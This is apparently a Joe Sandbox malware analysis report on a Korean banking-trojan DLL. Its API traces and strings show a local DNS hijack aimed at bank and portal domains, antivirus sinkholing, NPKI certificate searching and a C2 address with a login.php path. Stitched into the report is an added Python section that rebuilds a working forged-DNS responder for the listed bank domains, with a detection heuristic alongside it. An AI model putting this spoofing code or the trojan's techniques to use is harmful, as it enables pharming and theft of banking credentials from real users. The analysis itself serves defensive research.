GlobalAlloc 6915->6916 6917 10007173 6916->6917 6918 100071bb GlobalFree 6916->6918 6917->6917 6917->6918 6918->6914 6920 100050c0 wvsprintfA 6919->6920 6921 100076a1 6920->6921 6937 10005180 PathFileExistsA 6921->6937 6923 100076ab 6924 100076b2 6923->6924 6938 10005290 CreateFileA 6923->6938 6924->6872 6926 100076df 6927 100076e9 6926->6927 6939 100052c0 ReadFile 6926->6939 6927->6872 6929 10007711 6940 100051c0 CloseHandle 6929->6940 6931 10007717 6941 10005190 StrStrIA 6931->6941 6933 10007722 6934 10007729 6933->6934 6942 10005190 StrStrIA 6933->6942 6934->6872 6936 1000773d 6936->6872 6937->6923 6938->6926 6939->6929 6940->6931 6941->6933 6942->6936 6943->6880 6944->6883 6945->6885 6947 10005620 5 API calls 6946->6947 6948 10008c04 6947->6948 6981 10008b90 6948->6981 6950 10008c0c 6951 10008c11 6950->6951 6952 10008c1c 6D262DD0 6950->6952 6953 10007ca0 8 API calls 6952->6953 6955 10008c46 6953->6955 6954 10007420 2 API calls 6956 10008ca9 GetTickCount srand 6954->6956 6955->6954 6979 100091a6 6955->6979 6958 10008d3a rand 6956->6958 6959 10008d43 6958->6959 6959->6958 6960 10008d56 wsprintfA CreateDirectoryA rand 6959->6960 6961 10008db4 rand 6960->6961 6962 10008daf 6960->6962 6963 10008dc3 6961->6963 6964 10008dc8 rand 6961->6964 6962->6961 6963->6964 6965 10008dd7 6964->6965 6966 10008ddc rand 6964->6966 6965->6966 6967 10008df0 rand 6966->6967 6968 10008deb 6966->6968 6969 10008e04 wsprintfA wsprintfA 6967->6969 6970 10008dff 6967->6970 6968->6967 6988 10008660 6969->6988 6970->6969 6972 10008e45 6999 10008480 CreateFileA WriteFile CloseHandle 6972->6999 6974 10008e58 Sleep 6976 10008b90 20 API calls 6974->6976 6977 10008e78 6976->6977 6978 10008e80 50 API calls 6977->6978 6977->6979 7000 10008880 OpenSCManagerA 6978->7000 6982 10005620 5 API calls 6981->6982 6983 10008b9e CreateMutexA GetLastError 6982->6983 6984 10008bc0 6983->6984 6985 10008bdc ReleaseMutex CloseHandle 6984->6985 6986 10005460 11 API calls 6984->6986 6985->6950 6987 10008bd4 6986->6987 
6987->6985 6989 10001000 3 API calls 6988->6989 6990 1000869a RegOpenKeyA 6989->6990 6991 100086d5 _CxxThrowException 6990->6991 6992 100086ea RegQueryValueExA 6990->6992 6991->6992 6993 10008728 StrStrIA 6992->6993 6994 1000870d _CxxThrowException 6992->6994 6995 1000877e RegCloseKey 6993->6995 6996 1000873e lstrlen 6993->6996 6994->6972 6995->6972 7022 100084d0 6996->7022 6999->6974 7001 10008933 7000->7001 7002 10008944 CreateServiceA 7000->7002 7001->6979 7003 10008970 GetLastError 7002->7003 7004 100089aa 6 API calls 7002->7004 7003->7004 7005 1000897d OpenServiceA 7003->7005 7006 10008a32 _CxxThrowException 7004->7006 7007 10008a47 RegSetValueExA SetLastError 7004->7007 7010 1000898e 7005->7010 7011 1000899f StartServiceA 7005->7011 7006->7007 7008 10008a76 _CxxThrowException 7007->7008 7009 10008a8b RegCloseKey RegOpenKeyExA 7007->7009 7008->7009 7012 10008b00 RegSetValueExA SetLastError 7009->7012 7013 10008aeb _CxxThrowException 7009->7013 7010->6979 7011->7004 7014 10008b55 RegCloseKey 7012->7014 7015 10008b28 _CxxThrowException 7012->7015 7013->7012 7038 100087a0 OpenSCManagerA 7014->7038 7016 10008b44 7015->7016 7017 10008b4f 7015->7017 7016->7017 7019 10008b49 GetLastError 7016->7019 7017->6979 7019->7017 7020 10008b65 RegCloseKey 7020->6979 7023 10008507 7022->7023 7033 1000858b 7022->7033 7024 10008535 RegOpenKeyExA 7023->7024 7025 100085b6 RegOpenKeyExA 7023->7025 7026 100085e6 RegOpenKeyExA 7023->7026 7027 1000850e RegCreateKeyExA 7023->7027 7031 10008555 7024->7031 7024->7033 7032 100085d2 RegDeleteKeyA 7025->7032 7025->7033 7029 10008602 RegDeleteValueA 7026->7029 7026->7033 7027->7024 7027->7033 7029->7033 7030 10008627 7030->6995 7031->7033 7034 10008590 RegSetValueExA 7031->7034 7035 10008565 7031->7035 7032->7033 7037 1000863b RegCloseKey RegCloseKey 7033->7037 7034->7033 7035->7033 7036 1000856e RegSetValueExA 7035->7036 7036->7033 7037->7030 7039 10008874 7038->7039 7040 100087bf OpenServiceA 7038->7040 7039->7020 7041 10008861 
CloseServiceHandle 7040->7041 7042 100087da ChangeServiceConfigA StartServiceA 7040->7042 7041->7020 7043 10008804 GetLastError 7042->7043 7044 10008829 QueryServiceStatus 7042->7044 7043->7044 7045 10008811 CloseServiceHandle CloseServiceHandle 7043->7045 7046 10008859 CloseServiceHandle 7044->7046 7047 1000883c 7044->7047 7045->7020 7046->7041 7047->7046 7048 10008849 Sleep QueryServiceStatus 7047->7048 7048->7046 7048->7047 7049->6382 7052 10009abd 7056 100213a2 7052->7056 7054 10009ad0 6D262DD0 7055 10029fd0 7054->7055 7055->7055 7057 100213a7 7056->7057

                                      Control-flow Graph

                                      APIs
                                      • WSAStartup.WS2_32(00000202,?), ref: 10005E82
                                      • socket.WS2_32(00000002,00000002,00000000), ref: 10005E94
                                      • socket.WS2_32(00000002,00000002,00000000), ref: 10005EA0
                                      • htons.WS2_32(00000035), ref: 10005EB7 (0x35 = UDP port 53)
                                      • inet_addr.WS2_32(127.0.0.1), ref: 10005EC9
                                      • htons.WS2_32(00000035), ref: 10005ED1 (port 53 again, for the second socket)
                                      • inet_addr.WS2_32(?), ref: 10005ED8
                                      • bind.WS2_32(00000000,?,00000010), ref: 10005EE2 (binds the listener to 127.0.0.1:53)
                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 10005EFB (0x8004667E = FIONBIO, non-blocking mode)
                                      • select.WS2_32 ref: 10005F3C
                                      • WSAGetLastError.WS2_32 ref: 10005F46
                                      • Sleep.KERNEL32(000003E8), ref: 10005F51
                                      • recvfrom.WS2_32(00000000,?,00000200,00000000,00000000,?), ref: 10005F8B
                                      • wsprintfA.USER32 ref: 10005FF2
                                      • StrStrIA.SHLWAPI(www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c,?), ref: 1000600E
                                      • StrStrIA.SHLWAPI(?,alyac), ref: 1000602A
                                      • StrStrIA.SHLWAPI(?,ahnlab), ref: 1000603A
                                      • StrStrIA.SHLWAPI(?,v3lite), ref: 1000604A
                                      • malloc.MSVCRT ref: 1000605A
                                      • htons.WS2_32(00008180), ref: 10006091 (DNS flags: QR=1, RD=1, RA=1, RCODE=0 NOERROR)
                                      • htons.WS2_32(00008182), ref: 100060A8 (DNS flags: same with RCODE=2 SERVFAIL)
                                      • htons.WS2_32(00000001), ref: 100060B4 (ANCOUNT = 1)
                                      • htons.WS2_32(0000C00C), ref: 100060DA (compression pointer to the question name at offset 12)
                                      • htons.WS2_32(00000001), ref: 100060E3 (TYPE = A)
                                      • htons.WS2_32(00000001), ref: 100060EC (CLASS = IN)
                                      • htonl.WS2_32(0000007B), ref: 100060F5 (TTL = 123 seconds)
                                      • htons.WS2_32(00000004), ref: 10006101 (RDLENGTH = 4, one IPv4 address)
                                      • inet_addr.WS2_32(127.0.0.1), ref: 1000611C (RDATA: the forged A record)
                                      • sendto.WS2_32(?,?,00000010,00000000,?,00000010), ref: 1000615B
                                      • closesocket.WS2_32(?), ref: 10006194
                                      • closesocket.WS2_32(00000000), ref: 10006197
                                      • WSACleanup.WS2_32 ref: 10006199
                                      Strings
                                      • ahnlab, xrefs: 10006034
                                      • 127.0.0.1, xrefs: 10005EBF, 10006117
                                      • %s|, xrefs: 10005FEB
                                      • iRecv=0, xrefs: 10006177
                                      • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c, xrefs: 10006009
                                      • 8.8.8.8, xrefs: 10005E5D
                                      • v3lite, xrefs: 10006044
                                      • alyac, xrefs: 10006024
                                      • c:\3.txt, xrefs: 1000617C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: htons$inet_addr$closesocketsocket$CleanupErrorLastSleepStartupbindhtonlioctlsocketmallocrecvfromselectsendtowsprintf
                                      • String ID: %s|$127.0.0.1$8.8.8.8$ahnlab$alyac$c:\3.txt$iRecv=0$v3lite$www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c
                                      • API String ID: 3913902103-3128632860
                                      • Opcode ID: b85d70ee679bfbae6654c32a675e835e059487f67f27821f8a9bdb85a842703e
                                      • Instruction ID: 6a78d858e6a5a08b9cde055bca40f9f9f98f5805156c37e08f8545c097103a96
                                      • Opcode Fuzzy Hash: b85d70ee679bfbae6654c32a675e835e059487f67f27821f8a9bdb85a842703e
                                      • Instruction Fuzzy Hash: 8AA1BC71608345AFE720DB60CC85BAFB7E9EF88744F00491DF68597290DBB4EA08CB56
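                                      The API sequence above is a local DNS hijack: the routine binds UDP/53 on 127.0.0.1, reads each query with recvfrom, formats the queried name as "%s|" and searches it inside the pipe-separated bank/portal list (StrStrIA with the list as the first argument), separately searches the query name for the AV vendor markers alyac, ahnlab and v3lite, and then hand-assembles a one-answer reply from the htons/htonl constants (flags 0x8180 or 0x8182, ANCOUNT 1, C00C name pointer, type A, class IN, TTL 123, RDLENGTH 4) before returning it with sendto. The Python below is an added analyst example, not code from the sample or from Joe Sandbox: it rebuilds the forged reply with exactly those constants, mirrors the two StrStrIA checks, and derives a detection heuristic (fixed TTL 123 plus the other fixed fields) that can be run over captured DNS responses. Assumptions: the target list is truncated in the dump, so only the visible entries are used; the page shows 127.0.0.1 as the RDATA but not which names receive it, so the example sinkholes the AV names to 127.0.0.1 and points the bank/portal names at a TEST-NET placeholder (REDIRECT_IP); the qtype check and the SERVFAIL layout are choices made here, not observed behaviour.

```python
import socket
import struct

# Constants as they appear in the API trace of the DNS-spoofing routine.
FLAGS_RESPONSE_OK = 0x8180        # htons(0x8180): QR=1, RD=1, RA=1, RCODE=0
FLAGS_RESPONSE_SERVFAIL = 0x8182  # htons(0x8182): same, RCODE=2
NAME_POINTER = 0xC00C             # compression pointer to the question name (offset 12)
TYPE_A = 1
CLASS_IN = 1
SPOOF_TTL = 0x7B                  # htonl(0x7B): 123 seconds
RDLENGTH_IPV4 = 4                 # htons(4)

# Constructed target list: only the entries visible in the report (the dump truncates it).
TARGET_LIST = ("www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|"
               "www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki")
AV_MARKERS = ("alyac", "ahnlab", "v3lite")
SINKHOLE_IP = "127.0.0.1"   # the inet_addr("127.0.0.1") RDATA in the trace (assumed: for AV names)
REDIRECT_IP = "192.0.2.1"   # assumption: address for bank/portal names is not on the page


def encode_name(name):
    """Dotted hostname -> DNS label sequence terminated by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(msg, offset):
    """Decode a possibly compressed name; return (name, offset just past it)."""
    labels, end, jumped = [], offset, False
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                       # compression pointer
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped, offset = True, pointer
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if jumped else offset)


def build_query(txid, name):
    """A client A-record query as it would arrive on the hijacked 127.0.0.1:53 socket."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def parse_query(msg):
    txid, flags, qdcount = struct.unpack("!HHH", msg[:6])
    qname, qend = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[qend:qend + 4])
    return {"txid": txid, "flags": flags, "qdcount": qdcount, "qname": qname,
            "qtype": qtype, "qclass": qclass, "question_end": qend + 4}


def matches_target(qname, target_list=TARGET_LIST):
    """wsprintfA("%s|") + StrStrIA(list, name): case-insensitive search of "name|" inside
    the list. The trailing '|' stops a name that is only a prefix of an entry from matching."""
    return (qname + "|").lower() in (target_list + "|").lower()


def decide_answer(qname):
    """(flags, ip) for names the routine rewrites, None for names it leaves alone."""
    lowered = qname.lower()
    if any(marker in lowered for marker in AV_MARKERS):  # StrStrIA(name, "alyac") etc.
        return FLAGS_RESPONSE_OK, SINKHOLE_IP
    if matches_target(qname):
        return FLAGS_RESPONSE_OK, REDIRECT_IP
    return None


def build_spoof_response(query, answer_ip, flags=FLAGS_RESPONSE_OK):
    """Forged reply laid out as the htons/htonl sequence in the trace: header with the
    client's txid and ANCOUNT=1, the original question, then one A record whose name is
    the C00C pointer, TTL 123, RDLENGTH 4, followed by the 4-byte address."""
    q = parse_query(query)
    header = struct.pack("!HHHHHH", q["txid"], flags, 1, 1, 0, 0)
    answer = struct.pack("!HHHIH", NAME_POINTER, TYPE_A, CLASS_IN, SPOOF_TTL, RDLENGTH_IPV4)
    return header + query[12:q["question_end"]] + answer + socket.inet_aton(answer_ip)


def handle_packet(data):
    """Per-datagram logic of the listener: None = not rewritten, else the forged reply."""
    q = parse_query(data)
    if q["qtype"] != TYPE_A:          # assumption: only A queries are answered
        return None
    verdict = decide_answer(q["qname"])
    if verdict is None:
        return None
    flags, ip = verdict
    return build_spoof_response(data, ip, flags)


def is_spoofed_response(msg):
    """Detection heuristic from the fixed constants: one question, one answer, answer
    name is the C00C pointer, A/IN, TTL == 123, RDLENGTH == 4."""
    if len(msg) < 12:
        return False
    _, flags, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    if not flags & 0x8000 or qd != 1 or an != 1:
        return False
    _, qend = decode_name(msg, 12)
    aoff = qend + 4
    if len(msg) < aoff + 12 + RDLENGTH_IPV4:
        return False
    fields = struct.unpack("!HHHIH", msg[aoff:aoff + 12])
    return fields == (NAME_POINTER, TYPE_A, CLASS_IN, SPOOF_TTL, RDLENGTH_IPV4)
```

                                      Running handle_packet over a query for www.shinhan.com yields a 49-byte reply whose last four bytes are the redirect address; is_spoofed_response flags it, and rejects the same packet once its TTL is changed, so the heuristic should be paired with the 127.0.0.1:53 listener (the GetExtendedUdpTable check further down looks for port 0x35) rather than used alone.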

                                      Control-flow Graph

                                      APIs
                                      • lstrcpy.KERNEL32(00000000,?), ref: 1000B3F4
                                      • lstrcat.KERNEL32(00000000,10019C10), ref: 1000B40D
                                      • lstrcat.KERNEL32(00000000,*.*), ref: 1000B41C
                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 1000B42E
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 1000B454
                                      • lstrcpy.KERNEL32(00000000,?), ref: 1000B4AA
                                      • lstrcat.KERNEL32(00000000,10019C10), ref: 1000B4BD
                                      • lstrcat.KERNEL32(00000000,0000002E), ref: 1000B4CF
                                      • _strcmpi.MSVCRT ref: 1000B4DE
                                      • PathIsDirectoryA.SHLWAPI(?), ref: 1000B531
                                      • 6D262DD0.MFC42(00A00000,?,?,?,?,00000000), ref: 1000B544
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrcat$FileFindlstrcpy$D262DirectoryFirstNextPath_strcmpi
                                      • String ID: %s\%s$*.*$.$/image.php$107.163.241.186:12354/login.php$11121541$NPKI
                                      • API String ID: 3598801687-675274852
                                      • Opcode ID: 819a45a9d1b067640268757ad9253d2cf9f23331dbc3ac5890bd5eee83ea9760
                                      • Instruction ID: 7599fc823e929f38516ac2ea80dcb634581b4eaf94ee74f111db2df8a507a940
                                      • Opcode Fuzzy Hash: 819a45a9d1b067640268757ad9253d2cf9f23331dbc3ac5890bd5eee83ea9760
                                      • Instruction Fuzzy Hash: 6381E771604785AFE324CB24CC45BEB77E9EBC8344F004D2DE68993291EB75A648C792

                                      Control-flow Graph

                                      APIs
                                      • LoadLibraryA.KERNEL32 ref: 1000588A
                                      • GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 1000589A
                                      • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000), ref: 100058B1
                                      • malloc.MSVCRT ref: 100058CA
                                      • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,?,1000BBE4,00000035), ref: 100058F0 (caller at 1000BBE4 passes 0x35: checks whether UDP port 53 is already bound)
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: ExtendedTable$AddressLibraryLoadProcmalloc
                                      • String ID: GetExtendedUdpTable$iphlpapi.dll
                                      • API String ID: 2385667234-1809394930
                                      • Opcode ID: e1b00724cfaacc8b843fa86b310e38769440c808da8af4b399ce40dbed45f0c6
                                      • Instruction ID: d7c0e26cda9d5ea5ce5ff2f3001dfa376abaab0d7e51cba96a5469bc1a5c6616
                                      • Opcode Fuzzy Hash: e1b00724cfaacc8b843fa86b310e38769440c808da8af4b399ce40dbed45f0c6
                                      • Instruction Fuzzy Hash: CB21E171204302ABF710DF28EC85BAB37E4EF847A0F008A25F995D62C0D772D949C7A2

                                      Control-flow Graph

                                      APIs
                                      • sprintf.MSVCRT ref: 1000C1A9
                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1000C1C6
                                      • DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 1000C1F8 (0x74080 = SMART_GET_VERSION; the 0x18-byte out buffer is a GETVERSIONINPARAMS)
                                      • GetLastError.KERNEL32(00000400,?,00000000,00000000), ref: 1000C20C
                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 1000C21A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: ControlCreateDeviceErrorFileFormatLastMessagesprintf
                                      • String ID: \\.\PHYSICALDRIVE%d
                                      • API String ID: 1111953355-613073274
                                      • Opcode ID: c53000877ec2aa7fee595b4572a85b816ff392d08c2107d39e209743fa20e477
                                      • Instruction ID: 45ae0edda3d41c4c2eec03a22dee8fc668454583b3e0103b580059d381486647
                                      • Opcode Fuzzy Hash: c53000877ec2aa7fee595b4572a85b816ff392d08c2107d39e209743fa20e477
                                      • Instruction Fuzzy Hash: 3D4127762443046BF324DA38DC46FEB7385EB98760F508729FA55CB2C0EEB59A188395
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 1000562A
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 10005631
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10005647
                                      • AdjustTokenPrivileges.KERNELBASE ref: 1000568A
                                      • CloseHandle.KERNEL32 ref: 10005695
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                      • String ID:
                                      • API String ID: 3038321057-0
                                      • Opcode ID: e3783ca1f29b139df8556e5866564b38593cf1fe3dbbde3397e265e7e817bc56
                                      • Instruction ID: a2edfa9b86e6a0acb4b0852c084eebde7c3743d30616468f98f68bef03f890e1
                                      • Opcode Fuzzy Hash: e3783ca1f29b139df8556e5866564b38593cf1fe3dbbde3397e265e7e817bc56
                                      • Instruction Fuzzy Hash: 7B0129B4608301ABE704DF64CD85B6B77E8FBC8B41F80CA1CF94986291DB75D904CB62
                                      APIs
                                      • DeviceIoControl.KERNEL32(00000000,0007C088,?,00000020,?,00000210,1000C265,00000000), ref: 1000C110
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: ControlDevice
                                      • String ID:
                                      • API String ID: 2352790924-0
                                      • Opcode ID: 6efe1891206b3777681fb32c89ca79adf49100392fac54556cb4e8c3ccab099b
                                      • Instruction ID: dd68c41c000daad9a29386f739e30e366fb2defe37250152ab40d60b23e964fe
                                      • Opcode Fuzzy Hash: 6efe1891206b3777681fb32c89ca79adf49100392fac54556cb4e8c3ccab099b
                                      • Instruction Fuzzy Hash: 63F0A96228A3C29EE702CB688855BD2FF947B76710F0CD7C9F1D85B283C2548598D766
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(?,?), ref: 100051FA
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: CreateSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 3332741929-0
                                      • Opcode ID: b1a37351201e7f7fa222f0003396ead25511c011be7531a2d416dfbceb343984
                                      • Instruction ID: b514baa08b3f1d8f82369d583fde96a78a05e9397895c3dcff7847106b415855
                                      • Opcode Fuzzy Hash: b1a37351201e7f7fa222f0003396ead25511c011be7531a2d416dfbceb343984
                                      • Instruction Fuzzy Hash: EDB09275108300ABD304DB10C984C2BB7A9AB94320B008808F48582118C630D880CB21

                                      Control-flow Graph

                                      APIs
                                      • 6D262DD0.MFC42(?), ref: 10001800
                                      • 6D262DD0.MFC42(00001000,?), ref: 100018F9
                                      • lstrcpy.KERNEL32(00000000,00000001), ref: 10001905
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: D262$lstrcpy
                                      • String ID: $!$"$#$$$%$&$'$($)$*$+$,$-$.$/$0$1$2$3$4$5$6$7$8$9$:$;$<$>$?$VUUU
                                      • API String ID: 1611889739-3561551665
                                      • Opcode ID: e46855ab96d208aa0919aa6072f022ac120e40eb92bef6f217f5988191405041
                                      • Instruction ID: 8cabffa663a16b6991171aaa738c89542f520e9d9bfc23d5e5b8b96ced797da2
                                      • Opcode Fuzzy Hash: e46855ab96d208aa0919aa6072f022ac120e40eb92bef6f217f5988191405041
                                      • Instruction Fuzzy Hash: 9C325AB09293A18BE375CF09C5987DFBAE8FB89B44F10891FE1D986241C7B54645CF82

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 10007280: wsprintfA.USER32 ref: 100072AE
                                        • Part of subcall function 10007280: GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104), ref: 100072C5
                                        • Part of subcall function 10007280: GetModuleFileNameA.KERNEL32(10000000,C:\Users\user\Desktop\NaRZIOq3O8.dll,00000104), ref: 100072D7
                                        • Part of subcall function 10007280: strrchr.MSVCRT ref: 10007305
                                        • Part of subcall function 10007280: wsprintfA.USER32 ref: 10007322
                                        • Part of subcall function 10007280: wsprintfA.USER32 ref: 10007333
                                        • Part of subcall function 10007280: wsprintfA.USER32 ref: 10007344
                                        • Part of subcall function 10007280: 6D262DD0.MFC42(00000084), ref: 1000734B
                                      • CreateMutexA.KERNEL32(00000000,00000001,M107.163.241.193:6520,10019CD8), ref: 1000BB91
                                      • GetLastError.KERNEL32 ref: 1000BB97
                                      • PathIsDirectoryA.SHLWAPI(C:\Users\user\Desktop\11121541), ref: 1000BBCD
                                      • CreateDirectoryA.KERNEL32(C:\Users\user\Desktop\11121541,00000000), ref: 1000BC01
                                      • Sleep.KERNEL32(000007D0), ref: 1000BC17
                                      • DeleteFileA.KERNEL32(?), ref: 1000BC1A
                                      • CreateThread.KERNEL32(00000000,00000000,100099A0,00000000,00000000,00000000), ref: 1000BC3E
                                      • Sleep.KERNEL32(000003E8), ref: 1000BC45
                                      • WSAStartup.WS2_32(00000202,?), ref: 1000BC54
